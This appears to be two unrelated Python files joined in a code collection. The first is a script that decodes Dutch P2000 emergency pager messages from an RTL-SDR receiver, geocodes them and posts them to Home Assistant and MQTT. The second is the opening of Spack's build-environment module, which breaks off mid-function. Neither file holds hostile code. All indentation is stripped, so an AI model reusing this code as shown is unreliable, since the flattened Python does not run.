capcodes[fields[0].strip()] = "NO DESCR"
self.logger.info("{} records loaded".format(len(capcodes)))
return capcodes
except KeyError:
self.logger.debug(f"Could not parse file contents of: {filename}")
except OSError:
self.logger.debug(f"Could not open/read file: {filename}, ignoring filter")
return capcodes
def load_list(self, filename):
"""Load data in list."""
tmplist = []
try:
self.logger.info("Loading data from '{}'".format(filename))
with open(filename, "r") as text_file:
lines = text_file.readlines()
lines_strip = map((lambda line: line.strip()), lines)
tmplist = list(
filter(
lambda line: len(line) > 0
and line[0:1] != "#"
and line[0:1] != ";",
lines_strip,
)
)
self.logger.info("{} records loaded".format(len(tmplist)))
return tmplist
except KeyError:
self.logger.debug(f"Could not parse file contents of: {filename}")
except OSError:
self.logger.debug(f"Could not open/read file: {filename}")
return tmplist
def check_filter(mylist, text):
"""Check filter data."""
# If list is not loaded or empty allow all
if len(mylist) == 0:
return True
# Check if text applied matches at least one filter
for f_str in mylist:
if fnmatch.fnmatch(text, f_str):
return True
return False
def to_local_datetime(utc_dt):
"""Convert utc to local time."""
time_tuple = time.strptime(utc_dt, "%Y-%m-%d %H:%M:%S")
return time.ctime(calendar.timegm(time_tuple))
def p2000_get_prio(message):
"""Look for priority strings and return level."""
priority = 0
regex_prio1 = r"^A\s?1|\s?A\s?1|PRIO\s?1|^P\s?1"
regex_prio2 = r"^A\s?2|\s?A\s?2|PRIO\s?2|^P\s?2"
regex_prio3 = r"^B\s?1|^B\s?2|^B\s?3|PRIO\s?3|^P\s?3"
regex_prio4 = r"^PRIO\s?4|^P\s?4"
if re.search(regex_prio1, message, re.IGNORECASE):
priority = 1
elif re.search(regex_prio2, message, re.IGNORECASE):
priority = 2
elif re.search(regex_prio3, message, re.IGNORECASE):
priority = 3
elif re.search(regex_prio4, message, re.IGNORECASE):
priority = 4
return priority
# Init logging
logger = Logger("/home/pi/RTL-SDR-P2000Receiver-HA/", 7, True)
class Main:
"""Main class, start of application."""
def __init__(self):
self.running = True
self.messages = []
# Init logging
self.logger = logger
cfgfile = "config.ini"
# Load configuration
self.config = load_config(cfgfile)
if self.config:
self.logger.info(f"Loading configuration from '{cfgfile}'")
else:
self.logger.info(f"Created config file '{cfgfile}', edit it and restart the program.")
self.debug = self.config.getboolean("main", "debug")
# Set current folder so we can find the config files
os.chdir(os.path.dirname(os.path.abspath(__file__)))
self.logger.info(f"RTL-SDR P2000 Receiver for Home Assistant Version {VERSION}")
self.logger.info("Started at %s" % time.strftime("%A %H:%M:%S %d-%m-%Y"))
# Check if required software is installed
if not check_requirements(self):
self.logger.error("Application stopped, required software was not found!")
sys.exit(0)
self.rtlfm_cmd = self.config.get("rtl-sdr", "cmd")
self.use_hass = self.config.getboolean("home-assistant", "enabled")
self.baseurl = self.config.get("home-assistant", "baseurl")
self.token = self.config.get("home-assistant", "token")
self.sensorname = self.config.get("home-assistant", "sensorname")
self.use_mqtt = self.config.getboolean("mqtt", "enabled")
self.mqtt_server = self.config.get("mqtt", "mqtt_server")
self.mqtt_port = int(self.config.get("mqtt", "mqtt_port"))
self.mqtt_username = self.config.get("mqtt", "mqtt_user")
self.mqtt_password = self.config.get("mqtt", "mqtt_password")
self.mqtt_topic = self.config.get("mqtt", "mqtt_topic")
self.use_opencage = self.config.getboolean("opencage", "enabled")
self.opencagetoken = self.config.get("opencage", "token")
self.opencage_disabled = False
# Load capcodes data
self.capcodes = load_capcodes_dict(self, "db_capcodes.txt")
# Load plaatsnamen data
self.plaatsnamen = load_list(self, "db_plaatsnamen.txt")
# Load plaatsnamen afkortingen data
self.pltsnmn = load_capcodes_dict(self, "db_pltsnmn.txt")
# Load capcodes ignore data
self.ignorecapcodes = load_capcodes_filter_dict(self, "ignore_capcodes.txt")
# Load text ignore data
self.ignoretext = load_list(self, "ignore_text.txt")
# Load match text filter data
self.matchtext = load_list(self, "match_text.txt")
# Load match capcodes filter data
self.matchcapcodes = load_capcodes_filter_dict(self, "match_capcodes.txt")
# Start thread to get data from RTL-SDR stick
data_thread = threading.Thread(name="DataThread", target=self.data_thread_call)
data_thread.start()
# Start thread to post messages to Home Assistant
post_thread = threading.Thread(name="PostThread", target=self.post_thread_call)
post_thread.start()
# Run the wait loop
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
break
# Application is interrupted and is stopping
self.running = False
self.logger.info("Application stopped")
def post_data(self, msg):
"""Post data to Home Assistant via Rest API and/or MQTT topic."""
data = {
"state": msg.body,
"attributes": {
"time received": msg.timestamp,
"group id": msg.groupid,
"receivers": msg.receivers,
"capcodes": msg.capcodes,
"priority": msg.priority,
"disciplines": msg.disciplines,
"raw message": msg.message_raw,
"region": msg.region,
"location": msg.location,
"postcode": msg.postcode,
"city": msg.city,
"address": msg.address,
"street": msg.street,
"remarks": msg.remarks,
"longitude": msg.longitude,
"latitude": msg.latitude,
"opencage": msg.opencage,
"mapurl": msg.mapurl,
"friendly_name": msg.friendly_name
},
}
if self.use_hass:
try:
self.logger.debug("Posting to Home Assistant")
headers = {
"Authorization": "Bearer " + self.token,
"content-type": "application/json",
}
response = requests.post(
self.baseurl + "/api/states/sensor." + self.sensorname,
headers=headers,
data=json.dumps(
data, default=lambda o: o.__dict__, sort_keys=True, indent=4
),
)
response.raise_for_status()
self.logger.debug(f"POST data: {data}")
self.logger.debug(f"POST status: {response.status_code} {response.reason}")
self.logger.debug(f"POST text: {response.text}")
self.logger.debug(f"OpenCage status: {msg.opencage}")
except requests.HTTPError:
self.logger.error(
f"HTTP Error while trying to post data, check baseurl and token in config.ini: {response.status_code} {response.reason}"
)
except requests.exceptions.SSLError as err:
self.logger.error(
f"SSL Error occurred while trying to post data, check baseurl in config.ini:\n{err}"
)
except requests.exceptions.ConnectionError as err:
self.logger.error(
f"Connection Error occurred while trying to post data, check baseurl in config.ini:\n{err}"
)
finally:
# Mark as posted to prevent race conditions
msg.is_posted = True
if self.use_mqtt:
try:
self.logger.debug("Posting to MQTT")
data = json.dumps(data)
client = mqtt.Client()
client.username_pw_set(self.mqtt_username, self.mqtt_password)
client.connect(self.mqtt_server, self.mqtt_port, 60)
client.publish(self.mqtt_topic, data)
client.disconnect()
self.logger.debug(
f"MQTT status: Posting to {self.mqtt_server}:{self.mqtt_port} topic:{self.mqtt_topic}"
)
self.logger.debug(f"MQTT json: {data}")
finally:
# Mark as posted to prevent race conditions
msg.is_posted = True
def data_thread_call(self):
"""Thread for parsing data from RTL-SDR."""
self.logger.info(f"RTL-SDR process started with: {self.rtlfm_cmd}")
multimon_ng = subprocess.Popen(
self.rtlfm_cmd, stdout=subprocess.PIPE, shell=True
)
try:
while self.running:
# Read line from process
line = multimon_ng.stdout.readline()
try:
line = line.decode("utf8", "backslashreplace")
# self.logger.debug(line)
except UnicodeDecodeError:
self.logger.debug(f"Error while decoding utf8 string: {line}")
line = ""
multimon_ng.poll()
if line.startswith("FLEX") and line.__contains__("ALN"):
line_data = line.split("|")
timestamp = line_data[1]
groupid = line_data[3].strip()
capcodes = line_data[4].strip()
message = line_data[6].strip()
priority = p2000_get_prio(message)
location = ""
postcode = ""
city = ""
address = ""
street = ""
longitude = ""
latitude = ""
opencage = ""
mapurl = ""
friendly_name = "P2000 SDR"
self.logger.debug(line.strip())
# Get address info if any, look for valid postcode and get the two words around them
# A2 (DIA: ja) AMBU 17106 Schiedamseweg 3134BA Vlaardingen VLAARD bon 8576
regex_address = r"(\w*.) ([1-9][0-9]{3}[a-zA-Z]{2}) (.\w*)"
addr = re.search(regex_address, message)
if addr:
street = addr.group(1)
postcode = addr.group(2)
city = addr.group(3)
address = f"{street} {postcode} {city}"
# remove Capitalized city name from message (when postcode is found)
regex_afkortingen = "[A-Z]{2,}"
afkortingen = re.findall(regex_afkortingen, message)
for afkorting in afkortingen:
if afkorting in self.pltsnmn:
message = re.sub(afkorting, "", message)
# Try to get city only when there is one after a prio
# A1 Breda
else:
regex_prio_loc = r"(^A\s?1|\s?A\s?2|B\s?1|^B\s?2|^B\s?3|PRIO\s?1|^P\s?1|PRIO\s?2|^P\s?2) (.\w*)"
loc = re.search(regex_prio_loc, message)
if loc and loc.group(2) in self.plaatsnamen:
city = loc.group(2)
else:
# Find all uppercase words and check if there is a valid city name amoung them
# A2 Ambulancepost Moordrecht Middelweg MOORDR V
regex_afkortingen = "[A-Z]{2,}"
afkortingen = re.findall(regex_afkortingen, message)
for afkorting in afkortingen:
if afkorting in self.pltsnmn:
city = self.pltsnmn[afkorting]["plaatsnaam"]
# If uppercase city is found, grab first word before that city name, likely to be the street
regex_address = rf"(\w*.) ({afkorting})"
addr = re.search(regex_address, message)
if addr:
street = addr.group(1)
address = f"{street} {city}"
# Change uppercase city to normal city in message
message = re.sub(afkorting, city, message)
# if no adress found, do wild guess
if not address:
# strip all status info from messag
regex_messagestrip = r"(^A\s?1|\s?A\s?2|B\s?1|^B\s?2|^B\s?3|PRIO\s?1|^P\s?1|PRIO\s?2|^P\s?2|^PRIO\s?3|^P\s?3|^PRIO\s?4|^P\s?4)(\W\d{2,}|.*(BR)\b|)|(rit:|rit|bon|bon:|ambu|dia|DIA)\W\d{5,8}|\b\d{5,}$|( : )|\(([^\)]+)\)( \b\d{5,}|)|directe (\w*)|(-)+/gi"
strip = (re.sub(regex_messagestrip, "", message, flags=re.I))
# strip any double spaces from message
regex_doublespaces = r"(^[ \t]+|[ \t]+$)"
strip = re.sub(regex_doublespaces, "",strip)
# strip all double words from message
regex_doublewords = r"(\b\S+\b)(?=.*\1)"
strip = re.sub(regex_doublewords, "",strip)
# search in leftover message for a city corrosponding to city list
for plaatsnaam in self.plaatsnamen:
if plaatsnaam in strip:
self.logger.debug("City found: " + plaatsnaam)
# find first word left from city
regex_plaatsnamen_strip = rf"\w*.[a-z|A-Z] \b{plaatsnaam}\b"
plaatsnamen_strip = re.search(regex_plaatsnamen_strip, strip)
if plaatsnamen_strip:
addr = plaatsnamen_strip.group(0)
# Final non address symbols strip
regex_plaatsnamen_strip_strip = r"(- )|(\w[0-9] )"
addr = re.sub(regex_plaatsnamen_strip_strip, "",addr)
address = addr
city = plaatsnaam
self.logger.debug("Adress found: " + plaatsnamen_strip.group(0))
if not check_filter(self.matchtext, message):
self.logger.debug(
f"Message '{message}' ignored (didn't match match_text)"
)
else:
if check_filter(self.ignoretext, message):
self.logger.debug(
f"Message '{message}' ignored (matched ignore_text)"
)
else:
# There can be several capcodes in one message
ignorematch = True
ignore = False
for capcode in capcodes.split(" "):
# Apply filter
if (
capcode in self.matchcapcodes
and self.matchcapcodes
):
self.logger.debug(
f"Capcode '{capcode}' found in '{self.matchcapcodes}' (capcode in match_capcodes)"
)
ignorematch = False
break
else:
self.logger.debug(
f"Capcode '{capcode}' not found in '{self.matchcapcodes}'"
)
continue
if (
capcode in self.ignorecapcodes
and self.ignorecapcodes and (len(capcodes.split(" ")) == 1)
):
self.logger.debug(
f"Message '{message}' ignored because msg contains only one capcode '{capcode}' which is found in '{self.ignorecapcodes}' (capcode in ignore_capcodes)")
ignore = True
break
if ignorematch:
self.logger.debug(
f"Message '{message}' ignored because none of the capcodes '{capcodes}' where found in '{self.matchcapcodes}' (didn't match match_capcodes)"
)
if ignore==False and ignorematch==False:
for capcode in capcodes.split(" "):
# Get data from capcode, if exist
if (
capcode in self.capcodes
and capcode not in self.ignorecapcodes
):
receiver = "{} ({})".format(
self.capcodes[capcode]["description"],
capcode,
)
discipline = "{} ({})".format(
self.capcodes[capcode]["discipline"],
capcode,
)
region = self.capcodes[capcode]["region"]
location = self.capcodes[capcode]["location"]
remark = self.capcodes[capcode]["remark"]
else:
receiver = capcode
discipline = ""
region = ""
remark = ""
# If this message was already received, only add extra info
if (
len(self.messages) > 0
and self.messages[0].body == message
):
if self.messages[0].receivers == "":
self.messages[0].receivers = receiver
elif receiver:
self.messages[0].receivers += (
", " + receiver
)
if self.messages[0].disciplines == "":
self.messages[0].disciplines = discipline
elif discipline:
self.messages[0].disciplines += (
", " + discipline
)
if self.messages[0].remarks == "":
self.messages[0].remarks = remark
elif remark:
self.messages[0].remarks += ", " + remark
if self.messages[0].region == "":
self.messages[0].region = region
self.messages[0].capcodes.append(capcode)
self.messages[0].location = location
self.messages[0].postcode = postcode
self.messages[0].city = city
self.messages[0].street = street
self.messages[0].address = address
else:
# After midnight (UTC), reset the opencage disable
hour = datetime.utcnow()
if hour.hour >= 0 and hour.minute >= 1 and hour.hour < 1 and hour.minute < 15:
self.opencage_disabled = False
# If address is filled and OpenCage is enabled check for GPS coordinates
if address and self.use_opencage and (self.opencage_disabled == False):
geocoder = OpenCageGeocode(
self.opencagetoken
)
try:
gps = geocoder.geocode(
address, countrycode="nl"
)
gpscheck = True
if gps:
latitude = gps[0]["geometry"]["lat"]
longitude = gps[0]["geometry"]["lng"]
mapurl = gps[0]["annotations"]["OSM"]["url"]
self.logger.debug(f"OpenCage results: {latitude}, {longitude}, {mapurl}")
else:
latitude = ""
longitude = ""
mapurl = ""
# Rate-error check from opencage
except RateLimitExceededError as rle:
self.logger.error(rle)
# Over rate, opencage check disabled
if rle:
self.opencage_disabled = True
except InvalidInputError as ex:
self.logger.error(ex)
else:
gpscheck = False
opencage = f"enabled: {self.use_opencage} ratelimit: {self.opencage_disabled} gps-checked: {gpscheck}"
msg = MessageItem()
msg.groupid = groupid
msg.receivers = receiver
msg.capcodes = [capcode]
msg.body = message
msg.message_raw = line.strip()
msg.disciplines = discipline
msg.priority = priority
msg.region = region
msg.location = location
msg.postcode = postcode
msg.longitude = longitude
msg.latitude = latitude
msg.city = city
msg.street = street
msg.address = address
msg.remarks = remark
msg.opencage = opencage
msg.mapurl = mapurl
msg.timestamp = to_local_datetime(timestamp)
msg.is_posted = False
msg.friendly_name = "P2000 SDR"
self.messages.insert(0, msg)
# Limit the message list size
if len(self.messages) > 100:
self.messages = self.messages[:100]
except KeyboardInterrupt:
os.kill(multimon_ng.pid, 9)
self.logger.debug("Data thread stopped")
# Thread for posting data to Home Assistant
def post_thread_call(self):
"""Thread for posting data."""
self.logger.debug("Post thread started")
while True:
if self.running is False:
break
now = time.monotonic()
for msg in self.messages:
if msg.is_posted is False and now - msg.timereceived >= 1.0:
self.post_data(msg)
time.sleep(1.0)
self.logger.debug("Post thread stopped")
# Start application
Main()
|
build_environment.py
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. Ths allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import iteritems
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.store
from spack.util.string import plural
from spack.util.environment import EnvironmentModifications, validate
from spack.util.environment import preserve_environment
from spack.util.environment import env_flag, filter_system_paths, get_path
from spack.util.environment import system_dirs
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_DEPENDENCIES = 'SPACK_DEPENDENCIES'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
# This avoids discrepencies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, pkg.spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(pkg.spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
build_prefixes = [dep.prefix for dep in build_deps]
link_prefixes = [dep.prefix for dep in link_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
rpath_prefixes = [dep.prefix for dep in rpath_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
link_prefixes = filter_system_paths(link_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
rpath_prefixes = filter_system_paths(rpath_prefixes)
# Prefixes of all of the package's dependencies go in SPACK_DEPENDENCIES
env.set_path(SPACK_DEPENDENCIES, build_link_prefixes)
# These variables control compiler wrapper behavior
env.set_path(SPACK_RPATH_DEPS, rpath_prefixes)
env.set_path(SPACK_LINK_DEPS, link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Install prefix
env.set(SPACK_PREFIX, pkg.prefix)
# Install root prefix
env.set(SPACK_INSTALL, spack.store.root)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
environment = compiler.environment
for command, variable in iteritems(environment):
if command == 'set':
for name, value in iteritems(variable):
env.set(name, value)
elif command == 'unset':
for name, _ in iteritems(variable):
env.unset(name)
elif command == 'prepend-path':
for name, value in iteritems(variable):
env.prepend_path(name, value)
elif command == 'append-path':
for name, value in iteritems(variable):
env.append_path(name, value)
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('${PACKAGE}-${HASH:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
# number of jobs spack will build with.
jobs = spack.config.get('config:build_jobs') or multiprocessing.cpu_count()
if not pkg.parallel:
jobs = 1
elif pkg.make_jobs:
jobs = pkg.make_jobs
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
def get_rpath_deps(pkg):
